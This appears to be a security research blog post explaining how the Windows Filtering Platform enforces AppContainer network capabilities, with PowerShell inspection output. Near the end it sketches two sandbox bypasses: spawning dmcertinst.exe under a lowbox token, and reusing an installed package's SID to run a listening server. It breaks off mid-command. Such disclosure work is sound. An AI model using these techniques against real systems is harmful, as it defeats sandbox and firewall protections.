The FWPM_CONDITION_ALE_USER_ID and FWPM_CONDITION_ALE_PACKAGE_ID conditions are based on the access token captured when creating the TCP or UDP socket. The FWPM_CONDITION_ALE_USER_ID condition stores a security descriptor which is used in an access check against the creator's token; if the token is granted access then the condition is considered to match. For FWPM_CONDITION_ALE_PACKAGE_ID the condition checks the package SID of the AppContainer token. If the token is not an AppContainer then the filtering engine sets the package SID to the NULL SID (S-1-0-0).

The FWPM_CONDITION_ALE_REMOTE_USER_ID is similar to the FWPM_CONDITION_ALE_USER_ID condition but compares against the remote authenticated user. In most cases sockets are not authenticated, however if IPsec is in use that can result in a remote user token being available to compare. It's also used in some higher-level layers such as RPC filters.

The match type can be one of the following:

  • FWP_MATCH_EQUAL
  • FWP_MATCH_EQUAL_CASE_INSENSITIVE
  • FWP_MATCH_FLAGS_ALL_SET
  • FWP_MATCH_FLAGS_ANY_SET
  • FWP_MATCH_FLAGS_NONE_SET
  • FWP_MATCH_GREATER
  • FWP_MATCH_GREATER_OR_EQUAL
  • FWP_MATCH_LESS
  • FWP_MATCH_LESS_OR_EQUAL
  • FWP_MATCH_NOT_EQUAL
  • FWP_MATCH_NOT_PREFIX
  • FWP_MATCH_PREFIX
  • FWP_MATCH_RANGE

The match types should hopefully be self explanatory based on their names. How the match is interpreted depends on the field's type and the value being used to check against.
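
As a rough sketch of how conditions are evaluated, with field and match type names taken from the tables above (the semantics are simplified and only a handful of match types are shown):

from collections import defaultdict
from dataclasses import dataclass
from typing import Any

@dataclass
class Condition:
    field_key: str   # e.g. "FWPM_CONDITION_IP_REMOTE_PORT"
    match_type: str  # e.g. "FWP_MATCH_EQUAL" or "FWP_MATCH_RANGE"
    value: Any       # the value (or range) to compare against

def condition_matches(cond: Condition, packet: dict) -> bool:
    actual = packet[cond.field_key]
    if cond.match_type == "FWP_MATCH_EQUAL":
        return actual == cond.value
    if cond.match_type == "FWP_MATCH_NOT_EQUAL":
        return actual != cond.value
    if cond.match_type == "FWP_MATCH_RANGE":
        low, high = cond.value
        return low <= actual <= high
    raise NotImplementedError(cond.match_type)

def filter_matches(conditions: list, packet: dict) -> bool:
    by_field = defaultdict(list)
    for cond in conditions:
        by_field[cond.field_key].append(cond)
    # Conditions of the same field type are OR'ed, distinct types are AND'ed.
    return all(
        any(condition_matches(c, packet) for c in group)
        for group in by_field.values()
    )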

Inspecting the Firewall Configuration

We now have an idea of the basics of how WFP works to filter network traffic. Let's look at how to inspect the current configuration. We can't use any of the normal firewall commands or UIs, such as the PowerShell NetSecurity module, since as I already mentioned these represent the Windows Defender view of the firewall.

Instead we need to use the RPC APIs BFE exposes to access the configuration, for example you can access a filter using the FwpmFilterGetByKey0 API. Note that the BFE maintains security descriptors to restrict access to WFP objects. By default nothing can be accessed by non-administrators, therefore you'd need to call the RPC APIs while running as an administrator.

You could implement your own tooling to call all the different APIs, but it'd be much easier if someone had already done it for us. For built-in tools the only one I know of is using netsh with the wfp namespace. For example to dump all the currently configured filters you can use the following command as an administrator:

PS> netsh wfp show filters file = -

This will print all filters in an XML format to the console. Be prepared to wait a while for the output to complete. You can also dump straight to a file. Of course you now need to interpret the XML results. It is possible to also specify certain parameters, such as local and remote addresses to reduce the output to only matching filters.

Processing an XML file doesn't sound too appealing. To make the firewall configuration easier to inspect I've added many of the BFE APIs to my NtObjectManager PowerShell module from version 1.1.32 onwards. The module exposes various commands which will return objects representing the current WFP configuration which you can easily use to inspect and group the results however you see fit.

Layer Configuration

Even though the layers are predefined in the WFP implementation it's still useful to be able to query the details about them. For this you can use the Get-FwLayer command.

PS> Get-FwLayer
KeyName                           Name
-------                           ----
FWPM_LAYER_OUTBOUND_IPPACKET_V6   Outbound IP Packet v6 Layer
FWPM_LAYER_IPFORWARD_V4_DISCARD   IP Forward v4 Discard Layer
FWPM_LAYER_ALE_AUTH_LISTEN_V4     ALE Listen v4 Layer
...

The output shows the SDK name for the layer, if it has one, and the name of the layer that the BFE service has configured. The layer can be queried by its SDK name, its GUID or a numeric ID, which we will come back to later. As we mostly only care about the ALE layers then there's a special AleLayer parameter to query a specific layer without needing to remember the full name or ID.

PS> (Get-FwLayer -AleLayer ConnectV4).Fields
KeyName                          Type      DataType
-------                          ----      --------
FWPM_CONDITION_ALE_APP_ID        RawData   ByteBlob
FWPM_CONDITION_ALE_USER_ID       RawData   TokenAccessInformation
FWPM_CONDITION_IP_LOCAL_ADDRESS  IPAddress UInt32
...

Each layer exposes the list of fields which represent the conditions that can be checked in that layer; you can access the list through the Fields property. The output shown above contains a few of the condition types we saw earlier in the table of conditions. The output also shows the type of the condition and the data type you should provide when filtering on that condition.

PS> Get-FwSubLayer | Sort-Object Weight | Select KeyName, Weight
KeyName                                   Weight
-------                                   ------
FWPM_SUBLAYER_INSPECTION                       0
FWPM_SUBLAYER_TEREDO                           1
MICROSOFT_DEFENDER_SUBLAYER_FIREWALL           2
MICROSOFT_DEFENDER_SUBLAYER_WSH                3
MICROSOFT_DEFENDER_SUBLAYER_QUARANTINE         4
...

You can also inspect the sublayers in the same way, using the Get-FwSubLayer command as shown above. The most useful information from the sublayer is the weight. As mentioned earlier this is used to determine the ordering of the associated filters. However, as we'll see you rarely need to query the weight yourself.

Filter Configuration

Enforcing the firewall rules is up to the filters. You can enumerate all filters using the Get-FwFilter command.

PS> Get-FwFilter
FilterId ActionType Name
-------- ---------- ----
68071    Block      Boot Time Filter
71199    Permit     @FirewallAPI.dll,-80201
71350    Block      Block inbound traffic to dmcertinst.exe
...

The default output shows the ID of a filter, the action type and the user defined name. The filter objects returned also contain the layer and sublayer identifiers as well as the list of matching conditions for the filter. As inspecting the filter is going to be the most common operation the module provides the Format-FwFilter command to format a filter object in a more readable format.

PS> Get-FwFilter -Id 71350 | Format-FwFilter
Name       : Block inbound traffic to dmcertinst.exe
Action Type: Block
Key        : c391b53a-1b98-491c-9973-d86e23ea8a84
Id         : 71350
Description:
Layer      : FWPM_LAYER_ALE_AUTH_RECV_ACCEPT_V4
Sub Layer  : MICROSOFT_DEFENDER_SUBLAYER_WSH
Flags      : Indexed
Weight     : 549755813888
Conditions :
FieldKeyName              MatchType Value
------------              --------- -----
FWPM_CONDITION_ALE_APP_ID Equal     \device\harddiskvolume3\windows\system32\dmcertinst.exe

The formatted output contains the layer and sublayer information, the assigned weight of the filter and the list of conditions. The layer is FWPM_LAYER_ALE_AUTH_RECV_ACCEPT_V4 which handles new incoming connections. The sublayer is MICROSOFT_DEFENDER_SUBLAYER_WSH which is used to group Windows Service Hardening rules which apply regardless of the normal firewall configuration.

In this example the filter only matches on the socket creator process executable's path. The end result if the filter matches the current state is for the IPv4 TCP network connection to be blocked at the MICROSOFT_DEFENDER_SUBLAYER_WSH sublayer. As already mentioned it now won't matter if a lower priority layer would permit the connection if the block is enforced.

How can we determine the ordering of sublayers and filters? You could manually extract the weights for each sublayer and filter and try and order them, and hopefully the ordering you come up with matches what WFP uses. A much simpler approach is to specify a flag when enumerating filters for a particular layer to request the BFE APIs sort the filters using the canonical ordering.

PS> Get-FwFilter -AleLayer ConnectV4 -Sorted
FilterId ActionType     Name
-------- ----------     ----
65888    Permit         Interface Un-quarantine filter
66469    Block          AppContainerLoopback
66467    Permit         AppContainerLoopback
66473    Block          AppContainerLoopback
...

The Sorted parameter specifies the flag to sort the filters. You can now go through the list of filters in order and try and work out what would be the matched filter based on some criteria you decide on. Again it'd be helpful if we could get the BFE service to do more of the hard work in figuring out what rules would apply given a particular process. For this we can specify some of the metadata that represents the connection being made and get the BFE service to only return filters which match on their conditions.

PS> $template = New-FwFilterTemplate -AleLayer ConnectV4 -Sorted
PS> $fs = Get-FwFilter -Template $template
PS> $fs.Count
65
PS> Add-FwCondition $template -ProcessId $pid
PS> $addr = Resolve-DnsName "www.google.com" -Type A
PS> Add-FwCondition $template -IPAddress $addr.Address -Port 80
PS> Add-FwCondition $template -ProtocolType Tcp
PS> Add-FwCondition $template -ConditionFlags 0
PS> $template.Conditions
FieldKeyName                     MatchType Value
------------                     --------- -----
FWPM_CONDITION_ALE_APP_ID        Equal     \device\harddisk...
FWPM_CONDITION_ALE_USER_ID       Equal     FirewallTokenInformation
FWPM_CONDITION_ALE_PACKAGE_ID    Equal     S-1-0-0
FWPM_CONDITION_IP_REMOTE_ADDRESS Equal     142.250.72.196
FWPM_CONDITION_IP_REMOTE_PORT    Equal     80
FWPM_CONDITION_IP_PROTOCOL       Equal     Tcp
FWPM_CONDITION_FLAGS             Equal     None
PS> $fs = Get-FwFilter -Template $template
PS> $fs.Count
2

To specify the metadata we need to create an enumeration template using the New-FwFilterTemplate command. We specify the Connect IPv4 layer as well as requesting that the results are sorted. Using this template with the Get-FwFilter command returns 65 results (on my machine).

Next we add some metadata, first from the current PowerShell process. This populates the App ID with the executable path as well as token information such as the user ID and package ID of an AppContainer. We then add details about the target connection request, specifying a TCP connection to www.google.com on port 80. Finally we add some condition flags; we'll come back to these flags later.

Using this new template results in only 2 filters whose conditions will match the metadata. Of course depending on your current configuration the number might be different. In this case 2 filters is much easier to understand than 65. If we format those two filters we see the following:

PS> $fs | Format-FwFilter
Name       : Default Outbound
Action Type: Permit
Key        : 07ba2a96-0364-4759-966d-155007bde926
Id         : 67989
Description: Default Outbound
Layer      : FWPM_LAYER_ALE_AUTH_CONNECT_V4
Sub Layer  : MICROSOFT_DEFENDER_SUBLAYER_FIREWALL
Flags      : None
Weight     : 9223372036854783936
Conditions :
FieldKeyName                       MatchType Value
------------                       --------- -----
FWPM_CONDITION_ORIGINAL_PROFILE_ID Equal     Public
FWPM_CONDITION_CURRENT_PROFILE_ID  Equal     Public

Name       : Default Outbound
Action Type: Permit
Key        : 36da9a47-b57d-434e-9345-0e36809e3f6a
Id         : 67993
Description: Default Outbound
Layer      : FWPM_LAYER_ALE_AUTH_CONNECT_V4
Sub Layer  : MICROSOFT_DEFENDER_SUBLAYER_FIREWALL
Flags      : None
Weight     : 3458764513820540928

Both of the two filters permit the connection and based on the name they're the default backstop when no other filters match. It's possible to configure each network profile with different default backstops. In this case the default is to permit outbound traffic. We have two of them because both match all the metadata we provided, although if we'd specified a profile other than Public then we'd only get a single filter.

Can we prove that this is the filter which matches a TCP connection? Fortunately we can: WFP supports gathering network events related to the firewall. An event includes the filter which permitted or denied the network request, and we can then compare it to our two filters to see if one of them matched. You can use the Get-FwNetEvent command to read the current circular buffer of events.

PS> Set-FwEngineOption -NetEventMatchAnyKeywords ClassifyAllow
PS> $s = [System.Net.Sockets.TcpClient]::new($addr.IPAddress, 80)
PS> Set-FwEngineOption -NetEventMatchAnyKeywords None
PS> $ev_temp = New-FwNetEventTemplate -Condition $template.Conditions
PS> Add-FwCondition $ev_temp -NetEventType ClassifyAllow
PS> Get-FwNetEvent -Template $ev_temp | Format-List
FilterId        : 67989
LayerId         : 48
ReauthReason    : 0
OriginalProfile : Public
CurrentProfile  : Public
MsFwpDirection  : 0
IsLoopback      : False
Type            : ClassifyAllow
Flags           : IpProtocolSet, LocalAddrSet, RemoteAddrSet, ...
Timestamp       : 8/5/2021 11:24:41 AM
IPProtocol      : Tcp
LocalEndpoint   : 10.0.0.101:63046
RemoteEndpoint  : 142.250.72.196:80
ScopeId         : 0
AppId           : \device\harddiskvolume3\windows\system32\wind...
UserId          : S-1-5-21-4266194842-3460360287-487498758-1103
AddressFamily   : Inet
PackageSid      : S-1-0-0

First we enable the ClassifyAllow event, which is generated when a firewall event is permitted. By default only firewall blocks are recorded using the ClassifyDrop event to avoid filling the small network event log with too much data. Next we make a connection to the Google web server we queried earlier to generate an event. We then disable the ClassifyAllow events again to reduce the risk we'll lose the event.

Next we can query for the current stored events using Get-FwNetEvent. To limit the network events returned to us we can specify a template in a similar way to when we queried for filters. In this case we create a new template using the New-FwNetEventTemplate command and copy the existing conditions from our filter template. We then add a condition to match on only ClassifyAllow events.

Formatting the results we can see the network connection event to TCP port 80. Crucially if you compare the FilterId value to the Id fields in the two enumerated filters we match the first filter. This gives us confidence that we have a basic understanding of how the filtering works. Let's move on to running some tests to determine how the AppContainer network restrictions are implemented through WFP.

It's worth noting at this point that because the network event buffer can be small, on the order of 30-40 events depending on load, it's possible on a busy server that events might be lost before you query for them. You can get a real-time trace of events by using the Start-FwNetEventListener command to avoid losing events.

Callout Drivers

As mentioned, a developer can implement their own custom functionality to inspect and modify network traffic. This functionality is used by various different products, ranging from AV products scanning your network traffic for badness to NMAP's NPCAP driver capturing loopback traffic.

To set up a callout the developer needs to do two things. First they need to register its callback functions for the callout using the FwpmCalloutRegister API in the kernel driver. Second they need to create a filter to use the callout by specifying the providerContextKey GUID and one of the action types which invoke a callout.

You can query the list of registered callouts using the FwpmCalloutEnum0 API in user-mode. I expose this API through the Get-FwCallout command.

PS> Get-FwCallout | Sort CalloutId | Select CalloutId, KeyName
CalloutId KeyName
--------- -------
        1 FWPM_CALLOUT_IPSEC_INBOUND_TRANSPORT_V4
        2 FWPM_CALLOUT_IPSEC_INBOUND_TRANSPORT_V6
        3 FWPM_CALLOUT_IPSEC_OUTBOUND_TRANSPORT_V4
        4 FWPM_CALLOUT_IPSEC_OUTBOUND_TRANSPORT_V6
        5 FWPM_CALLOUT_IPSEC_INBOUND_TUNNEL_V4
        6 FWPM_CALLOUT_IPSEC_INBOUND_TUNNEL_V6
...

The above output shows the callouts listed by their callout ID numbers. The ID number is key to finding the callback functions in the kernel. There doesn't seem to be a way of enumerating the addresses of callout functions directly (at least from user mode). This article shows a basic approach to extract the callback functions using a kernel debugger, although it's a little out of date.

The NETIO driver stores all registered callbacks in a large array, the index being the callout ID. If you want to find a specific callout then find the base of the array using the description in the article, then just calculate the offset based on a single callout structure and the index. For example on Windows 10 21H1 x64 the following command will dump a callout's classify callback function. Replace N with the callout ID; the magic numbers 198 and 50 are the offset into the gWfpGlobal global data table and the size of a callout entry, which you can discover through analyzing the code.

0: kd> ln poi(poi(poi(NETIO!gWfpGlobal)+198)+(50*N)+10)

If you're in kernel mode there's an undocumented KfdGetRefCallout function (and a corresponding KfdDeRefCallout to decrement the reference) exported by NETIO which will return a pointer to the internal callout structure based on the ID avoiding the need to extract the offsets from disassembly.

AppContainer Network Restrictions

The basics of accessing the network from an AppContainer sandbox is documented by Microsoft. Specifically the lowbox token used for the sandbox needs to have one or more capabilities enabled to grant access to the network. The three capabilities are:

  • internetClient - Grants client access to the Internet
  • internetClientServer - Grants client and server access to the Internet
  • privateNetworkClientServer - Grants client and server access to local private networks.

Client Capabilities

Pretty much all Windows Store applications are granted the internetClient capability as accessing the Internet is a thing these days. Even the built-in calculator has this capability, presumably so you can fill in feedback on how awesome a calculator it is.

Image showing the list of capabilities granted to Windows calculator application showing the “Your Internet Connection” capability is granted.

However, this shouldn't grant the ability to act as a network server, for that you need the internetClientServer capability. Note that Windows defaults to blocking incoming connections, so just because you have the server capability still doesn't ensure you can receive network connections. The final capability is privateNetworkClientServer which grants access to private networks as both a client and a server. What is the internet and what is private isn't made immediately clear, hopefully we'll find out from inspecting the firewall configuration.

PS> $token = Get-NtToken -LowBox -PackageSid TEST
PS> $addr = Resolve-DnsName "www.google.com" -Type A
PS> $sock = Invoke-NtToken $token {
>>   [System.Net.Sockets.TcpClient]::new($addr.IPAddress, 80)
>> }
Exception calling ".ctor" with "2" argument(s): "An attempt was made to access a socket in a way forbidden by its access permissions 216.58.194.164:80"
PS> $template = New-FwNetEventTemplate
PS> Add-FwCondition $template -IPAddress $addr.IPAddress -Port 80
PS> Add-FwCondition $template -NetEventType ClassifyDrop
PS> Get-FwNetEvent -Template $template | Format-List
FilterId               : 71079
LayerId                : 48
ReauthReason           : 0
...
PS> Get-FwFilter -Id 71079 | Format-FwFilter
Name       : Block Outbound Default Rule
Action Type: Block
Key        : fb8f5cab-1a15-4616-b63f-4a0d89e527f8
Id         : 71079
Description: Block Outbound Default Rule
Layer      : FWPM_LAYER_ALE_AUTH_CONNECT_V4
Sub Layer  : MICROSOFT_DEFENDER_SUBLAYER_WSH
Flags      : None
Weight     : 274877906944
Conditions :
FieldKeyName                  MatchType Value
------------                  --------- -----
FWPM_CONDITION_ALE_PACKAGE_ID NotEqual  NULL SID

In the above output we first create a lowbox token for testing the AppContainer access. In this example we don't provide any capabilities for the token so we're expecting the network connection should fail. Next we connect a TcpClient socket while impersonating the lowbox token, and the connection is immediately blocked with an error.

We then get the network event corresponding to the connection request to see what filter blocked the connection. Formatting the filter from the network event we find the “Block Outbound Default Rule”. This will block any AppContainer network connection, matched via the FWPM_CONDITION_ALE_PACKAGE_ID condition, which hasn't been permitted by a higher priority firewall filter.

Like with the “Default Outbound” filter we saw earlier, this is a backstop if nothing else matches. Unlike that earlier filter the default is to block rather than permit the connection. Another thing to note is the sublayer name. For “Block Outbound Default Rule” it's MICROSOFT_DEFENDER_SUBLAYER_WSH, which is used for built-in filters that aren't directly visible from the Defender firewall configuration, whereas MICROSOFT_DEFENDER_SUBLAYER_FIREWALL, used for “Default Outbound”, is a lower priority sublayer (based on its weight) and thus would never be evaluated due to the higher priority block.

Okay, we know how connections are blocked. Therefore there must be a higher priority filter which permits the connection within the MICROSOFT_DEFENDER_SUBLAYER_WSH sublayer. We could go back to manual inspection, but we might as well just see what the network event shows as the matching filter when we grant the internetClient capability.

PS> $cap = Get-NtSid -KnownSid CapabilityInternetClient
PS> $token = Get-NtToken -LowBox -PackageSid TEST -CapabilitySid $cap
PS> Set-FwEngineOption -NetEventMatchAnyKeywords ClassifyAllow
PS> $sock = Invoke-NtToken $token {
>>   [System.Net.Sockets.TcpClient]::new($addr.IPAddress, 80)
>> }
PS> Set-FwEngineOption -NetEventMatchAnyKeywords None
PS> $template = New-FwNetEventTemplate
PS> Add-FwCondition $template -IPAddress $addr.IPAddress -Port 80
PS> Add-FwCondition $template -NetEventType ClassifyAllow
PS> Get-FwNetEvent -Template $template | Format-List
FilterId        : 71075
LayerId         : 48
ReauthReason    : 0
...
PS> Get-FwFilter -Id 71075 | Format-FwFilter
Name       : InternetClient Default Rule
Action Type: Permit
Key        : 406568a7-a949-410d-adbb-2642ec3e8653
Id         : 71075
Description: InternetClient Default Rule
Layer      : FWPM_LAYER_ALE_AUTH_CONNECT_V4
Sub Layer  : MICROSOFT_DEFENDER_SUBLAYER_WSH
Flags      : None
Weight     : 412316868544
Conditions :
FieldKeyName                       MatchType Value
------------                       --------- -----
FWPM_CONDITION_ALE_PACKAGE_ID      NotEqual  NULL SID
FWPM_CONDITION_IP_REMOTE_ADDRESS   Range     Low: 0.0.0.0 High: 255.255.255.255
FWPM_CONDITION_ORIGINAL_PROFILE_ID Equal     Public
FWPM_CONDITION_CURRENT_PROFILE_ID  Equal     Public
FWPM_CONDITION_ALE_USER_ID         Equal     O:LSD:(A;;CC;;;S-1-15-3-1)(A;;CC;;;WD)(A;;CC;;;AN)

In this example we create a new token using the same package SID but with internetClient capability. When we connect the socket we now no longer get an error and the connection is permitted. Checking for the ClassifyAllow event we find the “InternetClient Default Rule” filter matched the connection.

Looking at the conditions we can see that it will only match if the socket creator is in an AppContainer, based on the FWPM_CONDITION_ALE_PACKAGE_ID condition. The FWPM_CONDITION_ALE_USER_ID condition also ensures that it will only match if the creator has the internetClient capability, which is S-1-15-3-1 in the SDDL format. This filter is what's granting access to the network.

One odd thing is in the FWPM_CONDITION_IP_REMOTE_ADDRESS condition. It seems to match on all possible IPv4 addresses. Shouldn't this exclude network addresses on our local “private” network? At the very least you'd assume this would block the reserved IP address ranges from RFC1918? The key to understanding this is the profile ID conditions, which are both set to Public. The computer I'm running these commands on has a single network interface configured to the public profile as shown:

Image showing the option of either Public or Private network profiles.

Therefore the firewall is configured to treat all network addresses in the same context, granting the internetClient capability access to any address including your local “private” network. This might be unexpected. In fact if you enumerate all the filters on the machine you won't find any filter to match the privateNetworkClientServer capability and using the capability will not grant access to any network resource.

If you switch the network profile to Private, you'll find there are now three “InternetClient Default Rule” filters (note on Windows 11 there will only be one, as it uses the OR'ing feature of conditions mentioned above to merge the three rules together).

Name       : InternetClient Default Rule
Action Type: Permit
...
------------                       --------- -----
FWPM_CONDITION_ALE_PACKAGE_ID      NotEqual  NULL SID
FWPM_CONDITION_IP_REMOTE_ADDRESS   Range     Low: 0.0.0.0 High: 10.0.0.0
FWPM_CONDITION_ORIGINAL_PROFILE_ID Equal     Private
FWPM_CONDITION_CURRENT_PROFILE_ID  Equal     Private
...

Name       : InternetClient Default Rule
Action Type: Permit
Conditions :
FieldKeyName                       MatchType Value
------------                       --------- -----
FWPM_CONDITION_ALE_PACKAGE_ID      NotEqual  NULL SID
FWPM_CONDITION_IP_REMOTE_ADDRESS   Range     Low: 239.255.255.255 High: 255.255.255.255
...

Name       : InternetClient Default Rule
Action Type: Permit
...
Conditions :
FieldKeyName                       MatchType Value
------------                       --------- -----
FWPM_CONDITION_ALE_PACKAGE_ID      NotEqual  NULL SID
FWPM_CONDITION_IP_REMOTE_ADDRESS   Range     Low: 10.255.255.255 High: 224.0.0.0
...

As you can see in the first filter, it covers addresses 0.0.0.0 to 10.0.0.0. The machine's private network is 10.0.0.0/8. The profile IDs are also now set to Private. The other two exclude the entire 10.0.0.0/8 network as well as the multicast group addresses from 224.0.0.0 to 240.0.0.0.

The profile ID conditions are important here if you have more than one network interface. For example if you have two, one Public and one Private, you would get a filter for the Public network covering the entire IP address range and the three Private ones excluding the private network addresses. The Public filter won't match if the network traffic is being sent from the Private network interface preventing the application without the right capability from accessing the private network.

Speaking of which, we can also now identify the filters which will match the private network capability. There are two, covering the private network range and the multicast range. We'll just show one of them.

Name       : PrivateNetwork Outbound Default Rule
Action Type: Permit
Key        : e0194c63-c9e4-42a5-bbd4-06d90532d5e6
Id         : 71640
Description: PrivateNetwork Outbound Default Rule
Layer      : FWPM_LAYER_ALE_AUTH_CONNECT_V4
Sub Layer  : MICROSOFT_DEFENDER_SUBLAYER_WSH
Flags      : None
Weight     : 36029209335832512
Conditions :
FieldKeyName                       MatchType Value
------------                       --------- -----
FWPM_CONDITION_ALE_PACKAGE_ID      NotEqual  NULL SID
FWPM_CONDITION_IP_REMOTE_ADDRESS   Range     Low: 10.0.0.0 High: 10.255.255.255
FWPM_CONDITION_ORIGINAL_PROFILE_ID Equal     Private
FWPM_CONDITION_CURRENT_PROFILE_ID  Equal     Private
FWPM_CONDITION_ALE_USER_ID         Equal     O:LSD:(A;;CC;;;S-1-15-3-3)(A;;CC;;;WD)(A;;CC;;;AN)

We can see in the FWPM_CONDITION_ALE_USER_ID condition that the connection would be permitted if the creator has the privateNetworkClientServer capability, which is S-1-15-3-3 in SDDL.

It is slightly ironic that the Public network profile is probably recommended even if you're on your own private network (Windows 11 even makes the recommendation explicit as shown below) in that it should reduce the exposed attack surface of the device from others on the network. However if an AppContainer application with the internetClient capability could be compromised it opens up your private network to access where the Private profile wouldn't.

Image showing the option of either Public or Private network profiles. This is from Windows 11 where Public is marked as recommended.

Aside: one thing you might wonder, if your network interface is marked as Private and the AppContainer application only has the internetClient capability, what happens if your DNS server is your local router at 10.0.0.1? Wouldn't the application be blocked from making DNS requests? Windows has a DNS client service which typically is always running. This service is what usually makes DNS requests on behalf of applications as it allows the results to be cached. The RPC server which the service exposes allows callers which have any of the three network capabilities to connect to it and make DNS requests, avoiding the problem. Of course if the service is disabled in-process DNS lookups will start to be used, which could result in weird name resolving issues depending on your network configuration.

We can now understand how issue 2207 I reported to Microsoft bypasses the capability requirements. If in the MICROSOFT_DEFENDER_SUBLAYER_WSH sublayer for an outbound connection there are Permit filters which are evaluated before the “Block Outbound Default Rule” filter then it might be possible to avoid needing capabilities.

PS> Get-FwFilter -AleLayer ConnectV4 -Sorted |
Where-Object SubLayerKeyName -eq MICROSOFT_DEFENDER_SUBLAYER_WSH |
Select-Object ActionType, Name
...
Permit     Allow outbound TCP traffic from dmcertinst.exe
Permit     Allow outbound TCP traffic from omadmclient.exe
Permit     Allow outbound TCP traffic from deviceenroller.exe
Permit     InternetClient Default Rule
Permit     InternetClientServer Outbound Default Rule
Block      Block all outbound traffic from SearchFilterHost
Block      Block outbound traffic from dmcertinst.exe
Block      Block outbound traffic from omadmclient.exe
Block      Block outbound traffic from deviceenroller.exe
Block      Block Outbound Default Rule
Block      WSH Default Outbound Block

PS> Get-FwFilter -Id 72753 | Format-FwFilter
Name       : Allow outbound TCP traffic from dmcertinst.exe
Action Type: Permit
Key        : 5237f74f-6346-4038-a48d-4b779f862e65
Id         : 72753
Description:
Layer      : FWPM_LAYER_ALE_AUTH_CONNECT_V4
Sub Layer  : MICROSOFT_DEFENDER_SUBLAYER_WSH
Flags      : Indexed
Weight     : 422487342972928
Conditions :
FieldKeyName               MatchType Value
------------               --------- -----
FWPM_CONDITION_ALE_APP_ID  Equal     \device\harddiskvolume3\windows\system32\dmcertinst.exe
FWPM_CONDITION_IP_PROTOCOL Equal     Tcp

As we can see in the output there are quite a few Permit filters before the “Block Outbound Default Rule” filter, and of course I've also cropped the list to make it smaller. If we inspect the “Allow outbound TCP traffic from dmcertinst.exe” filter, we find that it only matches on the App ID and the IP protocol. As it doesn't have any AppContainer-specific checks, any sockets created in the context of a dmcertinst process would be permitted to make TCP connections.

Once the “Allow outbound TCP traffic from dmcertinst.exe” filter matches, the sublayer evaluation is terminated and it never reaches the “Block Outbound Default Rule” filter. This is fairly trivial to exploit, as long as the AppContainer process is allowed to spawn new processes, which is allowed by default.
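To illustrate, a minimal sketch using the same NtObjectManager tooling (the "TEST" package name is arbitrary, and you'd still need a way to run your own code inside the spawned process, since the filter's App ID condition only cares about the executable path):

PS> $token = Get-NtToken -LowBox -PackageSid "TEST"
PS> New-Win32Process -CommandLine "C:\Windows\System32\dmcertinst.exe" -Token $token

Any socket created in the new process would match the Permit filter before the AppContainer block rules are ever consulted.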

Server Capabilities

What about the internetClientServer capability, how does that function? First, there's a second set of outbound filters to cover the capability with the same network addresses as the base internetClient capability. The only difference is the FWPM_CONDITION_ALE_USER_ID condition checks for the internetClientServer (S-1-15-3-2) capability instead. For inbound connections the FWPM_LAYER_ALE_AUTH_RECV_ACCEPT_V4 layer contains the filter.

PS> Get-FwFilter -AleLayer RecvAcceptV4 -Sorted |

Where-Object Name -Match InternetClientServer |

Format-FwFilter

Name       : InternetClientServer Inbound Default Rule

Action Type: Permit

Key        : 45c5f1d5-6ad2-4a2a-a605-4cab7d4fb257

Id         : 72470

Description: InternetClientServer Inbound Default Rule

Layer      : FWPM_LAYER_ALE_AUTH_RECV_ACCEPT_V4

Sub Layer  : MICROSOFT_DEFENDER_SUBLAYER_WSH

Flags      : None

Weight     : 824633728960

Conditions :

FieldKeyName                       MatchType Value

------------                       --------- -----

FWPM_CONDITION_ALE_PACKAGE_ID      NotEqual  NULL SID

FWPM_CONDITION_IP_REMOTE_ADDRESS   Range    

Low: 0.0.0.0 High: 255.255.255.255

FWPM_CONDITION_ORIGINAL_PROFILE_ID Equal     Public

FWPM_CONDITION_CURRENT_PROFILE_ID  Equal     Public

FWPM_CONDITION_ALE_USER_ID         Equal    

O:LSD:(A;;CC;;;S-1-15-3-2)(A;;CC;;;WD)(A;;CC;;;AN)

The example shows the filter for a Public network interface granting an AppContainer application the ability to receive network connections. However, this will only be permitted if the socket creator has the internetClientServer capability. Note that there would be similar rules if the network interface were marked as Private, but granting access only with the privateNetworkClientServer capability.

As mentioned earlier, just because an application has one of these capabilities doesn't mean it can receive network connections; the default configuration will still block the inbound connection. However, when a UWP application which requires one of the two server capabilities is installed, the AppX installer service registers the AppContainer profile with the Windows Defender Firewall service. This adds a filter to permit the AppContainer package to receive inbound connections. For example, the following is for the Microsoft Photos application, which is typically installed by default:

PS> Get-FwFilter -Id 68299 |

Format-FwFilter -FormatSecurityDescriptor -Summary

Name       : @{Microsoft.Windows.Photos_2021...

Action Type: Permit

Key        : 7b51c091-ed5f-42c7-a2b2-ce70d777cdea

Id         : 68299

Description: @{Microsoft.Windows.Photos_2021...

Layer      : FWPM_LAYER_ALE_AUTH_RECV_ACCEPT_V4

Sub Layer  : MICROSOFT_DEFENDER_SUBLAYER_FIREWALL

Flags      : Indexed

Weight     : 10376294366095343616

Conditions :

FieldKeyName                  MatchType Value

------------                  --------- -----

FWPM_CONDITION_ALE_PACKAGE_ID Equal    

microsoft.windows.photos_8wekyb3d8bbwe

FWPM_CONDITION_ALE_USER_ID    Equal     O:SYG:SYD:(A;;CCRC;;;S-1-5-21-3563698930-1433966124...

<Owner> (Defaulted) : NT AUTHORITY\SYSTEM

<Group> (Defaulted) : NT AUTHORITY\SYSTEM

<DACL>

DOMAIN\alice: (Allowed)(None)(Full Access)

APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:...

APPLICATION PACKAGE AUTHORITY\Your Internet connection:...

APPLICATION PACKAGE AUTHORITY\Your Internet connection,...

APPLICATION PACKAGE AUTHORITY\Your home or work networks:...

NAMED CAPABILITIES\Proximity: (Allowed)(None)(Full Access)

The filter only checks that the package SID matches and that the socket creator is a specific user in an AppContainer. Note this rule doesn't do any checking on the executable file, remote IP address, port or profile ID. Once an installed AppContainer application is granted a server capability it can act as a server through the firewall for any traffic type or port.

A normal application could abuse this configuration to run a network service without the administrator access normally required to grant an executable that access. All you'd need to do is create an arbitrary AppContainer process in the permitted package and grant it the internetClientServer and/or privateNetworkClientServer capabilities. If there isn't an application installed with the appropriate firewall rules, a non-administrator user can install any signed application with the appropriate capabilities to add them. While this clearly circumvents the expected administrator requirements for new listening processes, it's presumably by design. A sketch of the technique follows.
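A minimal sketch (assuming the NtObjectManager tooling used throughout; the port is arbitrary, and the Photos package family name is taken from the filter output above):

PS> $cap = Get-NtSid -Sddl "S-1-15-3-2"
PS> $token = Get-NtToken -LowBox -PackageSid "microsoft.windows.photos_8wekyb3d8bbwe" -cap $cap
PS> Invoke-NtToken $token {
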